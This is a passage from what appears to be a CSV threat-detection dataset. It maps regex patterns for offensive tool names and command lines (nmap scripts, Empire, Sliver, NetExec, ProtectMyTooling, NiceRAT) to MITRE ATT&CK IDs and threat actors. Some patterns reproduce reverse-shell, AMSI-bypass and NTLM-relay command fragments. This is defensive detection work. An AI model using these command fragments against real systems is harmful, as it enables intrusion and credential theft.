BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2289" "* netbus-info.nse*",".{0,1000}\snetbus\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2290" "* netbus-version.nse*",".{0,1000}\snetbus\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2291" "* --netcat-port *",".{0,1000}\s\-\-netcat\-port\s.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","2293" "* NetClone.exe*",".{0,1000}\sNetClone\.exe.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","2294" "* --netreactor-control-flow-obfuscation *",".{0,1000}\s\-\-netreactor\-control\-flow\-obfuscation\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2295" "* --netreactor-incremental-obfuscation 
*",".{0,1000}\s\-\-netreactor\-incremental\-obfuscation\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2296" "* --netreactor-obfuscate-public-types *",".{0,1000}\s\-\-netreactor\-obfuscate\-public\-types\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2297" "* --netreactor-stealth-mode *",".{0,1000}\s\-\-netreactor\-stealth\-mode\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2298" "* netripper*",".{0,1000}\snetripper.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2299" "* NetRipper.dll*",".{0,1000}\sNetRipper\.dll.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","2300" "* new Sh('127.0.0.1',9000)*",".{0,1000}\snew\sSh\(\'127\.0\.0\.1\',9000\).{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#content","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","2304" "* --NewCertPath *.pfx --NewCertPassword *",".{0,1000}\s\-\-NewCertPath\s.{0,1000}\.pfx\s\-\-NewCertPassword\s.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001 - T1649","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","0","N/A","N/A","10","7","671","109","2024-08-17T16:40:07Z","2021-06-09T22:04:18Z","2305" "* 
NewLocalAdmin(*",".{0,1000}\sNewLocalAdmin\(.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","N/A","10","1162","143","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z","2306" "* nexpose-brute.nse*",".{0,1000}\snexpose\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2307" "* nfs-ls.nse*",".{0,1000}\snfs\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2308" "* nfs-showmount.nse*",".{0,1000}\snfs\-showmount\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2309" "* nfs-statfs.nse*",".{0,1000}\snfs\-statfs\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2310" "* NiceRAT.py*",".{0,1000}\sNiceRAT\.py.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","2312" "* nightCrawler.ps1*",".{0,1000}\snightCrawler\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","2313" "* nikto.pl *",".{0,1000}\snikto\.pl\s.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability 
Scanner","https://github.com/sullo/nikto","1","0","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","2314" "* nimcrypt*",".{0,1000}\snimcrypt.{0,1000}","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","0","N/A","N/A","N/A","1","98","7","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z","2315" "* --nimcrypt2-llvm-obfuscator *",".{0,1000}\s\-\-nimcrypt2\-llvm\-obfuscator\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2316" "* --nimsyscall-hellsgate *",".{0,1000}\s\-\-nimsyscall\-hellsgate\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2319" "* --nimsyscall-noamsi *",".{0,1000}\s\-\-nimsyscall\-noamsi\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2320" "* --nimsyscall-obfuscate 
*",".{0,1000}\s\-\-nimsyscall\-obfuscate\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2321" "* --nimsyscall-obfuscatefunctions *",".{0,1000}\s\-\-nimsyscall\-obfuscatefunctions\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2322" "* --nimsyscall-peinject *",".{0,1000}\s\-\-nimsyscall\-peinject\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2323" "* --nimsyscall-reflective *",".{0,1000}\s\-\-nimsyscall\-reflective\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2324" "* --nimsyscall-remoteinject *",".{0,1000}\s\-\-nimsyscall\-remoteinject\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented 
weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2325" "* --nimsyscall-remotepatchamsi *",".{0,1000}\s\-\-nimsyscall\-remotepatchamsi\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2326" "* --nimsyscall-remotepatchetw *",".{0,1000}\s\-\-nimsyscall\-remotepatchetw\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2327" "* --nimsyscall-remoteprocess *",".{0,1000}\s\-\-nimsyscall\-remoteprocess\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2328" "* --nimsyscall-selfdelete *",".{0,1000}\s\-\-nimsyscall\-selfdelete\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer 
bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2329" "* --nimsyscall-shellcode *",".{0,1000}\s\-\-nimsyscall\-shellcode\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2330" "* --nimsyscall-sleepycrypt *",".{0,1000}\s\-\-nimsyscall\-sleepycrypt\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2331" "* --nimsyscall-syswhispers *",".{0,1000}\s\-\-nimsyscall\-syswhispers\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2332" "* Ninja.py*",".{0,1000}\sNinja\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","2333" "* nje-node-brute.nse*",".{0,1000}\snje\-node\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2336" "* nje-pass-brute.nse*",".{0,1000}\snje\-pass\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2337" "* --nla-redirection-host * --nla-redirection-port *",".{0,1000}\s\-\-nla\-redirection\-host\s.{0,1000}\s\-\-nla\-redirection\-port\s.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","2338" "* nntp-ntlm-info.nse*",".{0,1000}\snntp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2339" "* NoAmsi.ps1*",".{0,1000}\sNoAmsi\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2340" "* -NoBase64 *",".{0,1000}\s\-NoBase64\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1061","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2341" "* --no-bruteforce *",".{0,1000}\s\-\-no\-bruteforce\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","2342" "* --no-bruteforce *",".{0,1000}\s\-\-no\-bruteforce\s.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - 
T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2343" "* --no-bruteforce --continue-on-success*",".{0,1000}\s\-\-no\-bruteforce\s\-\-continue\-on\-success.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2344" "* --no-bruteforce --continue-on-success*",".{0,1000}\s\-\-no\-bruteforce\s\-\-continue\-on\-success.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2345" "* -NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8*",".{0,1000}\s\-NoExit\s\-Command\s\[Console\]\:\:OutputEncoding\=\[Text\.UTF8Encoding\]\:\:UTF8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","2347" "* --no-http-server -smb2support -t * -c *",".{0,1000}\s\-\-no\-http\-server\s\-smb2support\s\-t\s.{0,1000}\s\-c\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Example command to relay the hash to authenticate as local admin (if the service account has these privileges) and run calc.exe. Omit the -c parameter to attempt a secretsdump instead.","T1550 - T1555 - T1212 - T1558","N/A","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2348" "* --nomain -d:exportDll --passL:*",".{0,1000}\s\-\-nomain\s\-d\:exportDll\s\-\-passL\:.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","2350" "* -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.*",".{0,1000}\s\-NoP\s\-NonI\s\-W\sHidden\s\-Exec\sBypass\s\-Command\sNew\-Object\sSystem\.Net\.Sockets\..{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","N/A","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","2351" "* -NoP -NonI -W Hidden -Exec Bypass -Command New-Object 
System.Net.Sockets.TCPClient*",".{0,1000}\s\-NoP\s\-NonI\s\-W\sHidden\s\-Exec\sBypass\s\-Command\sNew\-Object\sSystem\.Net\.Sockets\.TCPClient.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","N/A","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","2353" "* -NoP -sta -NonI -W Hidden -Enc *",".{0,1000}\s\-NoP\s\-sta\s\-NonI\s\-W\sHidden\s\-Enc\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 